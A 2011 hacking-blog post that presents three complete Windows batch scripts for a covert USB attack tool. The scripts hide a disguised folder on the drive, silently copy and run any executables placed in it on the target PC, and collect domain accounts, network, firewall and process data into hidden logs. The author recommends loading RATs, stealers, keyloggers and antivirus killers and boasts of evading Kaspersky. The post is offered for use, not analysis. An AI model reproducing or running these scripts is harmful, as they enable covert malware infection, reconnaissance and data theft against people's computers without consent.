Posted by : Muhammad Haseeb Javed Friday, February 4, 2011

I have seen many different attempts at creating a USB hacking tool. The switchblade and hacksaw were okay, but they would set off many alarms deeming it useless, so I propose something different.

This uses (3) simple batch files, Go.bat, injector.bat, and sysinfo.bat. Save all three of these files to the root of any usb. Then run go.bat, it will create a hidden directory on your usb drive called Recycler.

Note: after first run the folders, and go.bat will be hidden system files, and injector, and sysinfo will move into another folder, they will no longer be in the root.

In this folder there are three sub folders, System (scripts will install here), Docs (logs go here) and BIN (Put any executable here, .exe, .bat, or .vbs, and it will copy it the target computer and execute it)

The concept here is there are no better tools for USB hacking than Rats, Stealers, Keyloggers, Downloaders, AV Killers, etc, that can be found on this site and made fud with the available crypters here. The reason for the copy and execute is because if you use an encryption algorithym like Blowfish for example, the execution time can be minutes or at least a long time. Longer than you probably want to stick around. I have copied and executed 15 files at once, like I-stealer, Cybergate, etc, and it takes about 10-15 seconds.

While this is occurring a second script is using windows tools to gather some quick intel like external ip, history, network statistics, ports utilized, etc.

I run this on a machine with KIS 2011 on it and no alarms occur, if your files are fud.

So here goes, thanks to Pithbot and Forum_Reader for their assistance.

Save all three files to root of usb and run go.bat. When complete your usb eject menu will come up, after that add some files to the BIN folder and see this will do.

::__Go.bat__::
Code:
@(echo off & break off & Title _) >nul
If %~d0 == %systemdrive% goto :EOF
::First Run
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
:Next
if exist injector.bat copy /y injector.bat %wrkdir% >nul && del /f /q %~d0\injector.bat >nul
if exist sysinfo.bat copy /y sysinfo.bat %wrkdir% >nul && del /f /q %~d0\sysinfo.bat >nul
if exist inject.vbs del /f /q %~d0\inject.vbs >nul
if exist sysinfo.vbs del /f /q %~d0\sysinfo.vbs >nul
CD %wrkdir%>nul
If exist inject.vbs Start "" inject.vbs>nul & Goto Next1
If exist injector.bat Start "" injector.bat >nul
:Next1
If exist sysinfo.vbs Start "" sysinfo.vbs >nul & Goto Next2
Call sysinfo.bat
:Next2
attrib +s +h %0
cls
exit

::__Injector.bat__::
Code:
@(echo off & break off & Title _) >nul
::-----------------------------------------------------------------------------------------------------------------------------::
::This is called the Injector
:: This script is meant to only run from flash drive
:: On first run, it makes the %wrkdir% on your flashdrive as a place to hide files
:: I used recycler\S-15~ ect to make it look not obvious as a hidden system folder
:: Any executable files place in the "Bin" folder will be copied to %temp% and executed, exe, bat, and vbs
:: It have put 10-15 files in there at once and it copies and executes them all in about 10 seconds
::Very handy if you have things that inject into memory, that will otherwise cause virtual memory errors if they are executed from USB.
::It's nice because you don't need to know filenames and edit script all of the time it executes everything
::If you make your scripts self destruct that would be good if they only need to run once
:: I have another script that logs pc, system and network, open ports, history, info etc, using only windows tools
:: It gets called by another script along with this one, and saves to "\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
::When this script is complete it brings up the safely remove hardware menu to signify completion for drive ejection.
::--------------------------------------------------------------------------------------------------------------------------------::
::--------------------------------------------------------------------------------------------------------------------------------::
@echo off & @break off & title _
if not [%1]==[] goto :%1
    call %0 system
    exit

:system
if exist inject.vbs start "" "inject.vbs"
    echo set o = createobject("wscript.shell") > inject.vbs
    echo o.run "%~0 script", vbhide, true >> inject.vbs
    start "" "inject.vbs"
    exit

:script
If %~d0 == %systemdrive% goto :EOF
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\BIN"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
Goto :EOF
:Next
::Non obvious directory creation on PC
If not exist "%temp%\MessengerCache" mkdir "%temp%\MessengerCache" >nul
:ExeCheck
If exist "*exe" copy /y "*.exe" "%temp%\MessengerCache" & Goto EXEGooD
:BatCheck
If exist "*bat" copy /y "*bat" "%temp%\MessengerCache" & Goto BatGood
:VbsCheck
If exist "*vbs" copy /y "*vbs" "%temp%\MessengerCache" & Goto VbsGood
Goto :eof
:EXEGooD
For %%j IN ("%temp%\MessengerCache\*.Exe") DO Start ""  %%j
Goto BatCheck
:BatGood
For %%h IN ("%temp%\MessengerCache\*.Bat") DO Start ""  %%h
Goto VbsCheck
:VbsGood
For %%i IN ("%temp%\MessengerCache\*.Vbs") DO Start ""  %%i
Del /F /Q inject.vbs >nul
@cls & @Exit

::__Sysinfo.bat__::
Code:
@echo off & @break off & title _
if not [%1]==[] goto :%1
    call %0 system
    exit

:system
if exist sysinfo.vbs start "" "sysinfo.vbs"
    echo set o = createobject("wscript.shell") > sysinfo.vbs
    echo o.run "%~0 script", vbhide, true >> sysinfo.vbs
    start "" "sysinfo.vbs"
    exit

:script
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s && Attrib +s +h Recycler\*.txt
:Next
CD %wrkdir%>nul
set logfile=%wrkdir%\%computername%-%random%.txt 2>&1
::@@System_Info and Log Creation@@::
Echo ************************************ >> %logfile%
Echo ***********[System Info]************ >> %logfile%
Echo ************************************  >> %logfile%
Echo. >> %logfile%
Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %logfile%
time /t >> %logfile%
date /t >> %logfile%
Echo *********************************************** >> %logfile%
Echo ***********[External / Internal Ip]************ >> %logfile%
Echo ***********************************************  >> %logfile%
::This script for external ip was not written by me, got it from spam::
echo Function MyIP_XMLHTTP( )>wan.vbs
echo     Dim objRequest, strURL >>wan.vbs
echo     MyIP_XMLHTTP = "0.0.0.0" >>wan.vbs
echo     strURL = "http://www.whatismyip.com/automation/n09230945.asp"  >>wan.vbs
echo     Set objRequest = CreateObject( "Microsoft.XMLHTTP" )  >>wan.vbs
echo     objRequest.open "GET", strURL, False >>wan.vbs
echo     objRequest.send vbNull >>wan.vbs
echo     If objRequest.status = 200 Then MyIP_XMLHTTP =  objRequest.responseText >>wan.vbs
echo     Set objRequest = Nothing >>wan.vbs
echo End Function >>wan.vbs
echo ret = MyIP_XMLHTTP( ) >>wan.vbs
echo Set FSys = CreateObject("Scripting.FileSystemObject")  >>wan.vbs
echo Set MonFic = FSys.CreateTextFile("00001.tmp") >>wan.vbs
echo With MonFic >>wan.vbs
echo .writeLine ret >>wan.vbs
echo End With >>wan.vbs
call wan.vbs
::---------------------
for /F "tokens=* delims=" %%a in (00001.tmp) do set wanIP=%%a
del /F /Q wan.vbs >NUL
del /F /Q 00001.tmp >NUL
::---------------------
ipconfig |find "IPv4" > 00002.tmp
for /f "tokens=2 delims=:" %%a in (00002.tmp) do set lanIP=%%a
del /F /Q 00002.tmp >NUL
::---------------------
for /F "tokens=* delims=" %%i in ('reg query  "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages"')  do set lang=%%i
set lang=%lang:~68,5%
::---------------------
cls
echo. >> %logfile%
echo ^>^>^> Local IP:%lanIP% >> %logfile%
echo ^>^>^> Internet IP: %wanIP% >> %logfile%
echo ^>^>^> Localisation: %lang% >> %logfile%
Echo.  >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Network Info]*********** >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Network Info
net user /domain >> %logfile%
net group /domain >> %logfile%
net localgroup /domain >> %logfile%
net localgroup administrators /domain >> %logfile%
net localgroup "Account Operators" /domain >> %logfile%
net accounts /domain >> %logfile%
net view /domain >> %logfile%
net view >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Local Info]************* >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Local Info
ipconfig /all >> %logfile%
ipconfig /displaydns >> %logfile%
netstat -ano >> %logfile%
netstat >> %logfile%
arp -a >> %logfile%
tasklist /svc >> %logfile%
tasklist >> %logfile%
tasklist /v >> %logfile%
net share >> %logfile%
net use >> %logfile%
net accounts >> %logfile%
net localgroup >> %logfile%
net localgroup administrators >> %logfile%
systeminfo >> %logfile%
netsh firewall show config >> %logfile%
netsh advfirewall show allprofiles >> %logfile%
netsh advfirewall firewall show rule name=all >> %logfile%
netsh diag show all /v >> %logfile%
netsh diag /v >> %logfile%
ping localhost >> %logfile%
echo Completed Data Recovery on %time% %date% >> %logfile%
::@@Eject Drive to Signify Completion@@::
setlocal enableextensions
rundll32.exe shell32.dll,Control_RunDLL hotplug.dll
endlocal
:END
::Cleanup
ping localhost -n 1>nul
Del /F /Q sysinfo.vbs >nul
@cls
@exit

Leave a Reply

Subscribe to Posts | Subscribe to Comments

Popular Post

Labels

Blog Archive

- Copyright © _.:Learn To Hack:._ :: Hacking Tutorials :: Warez -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan -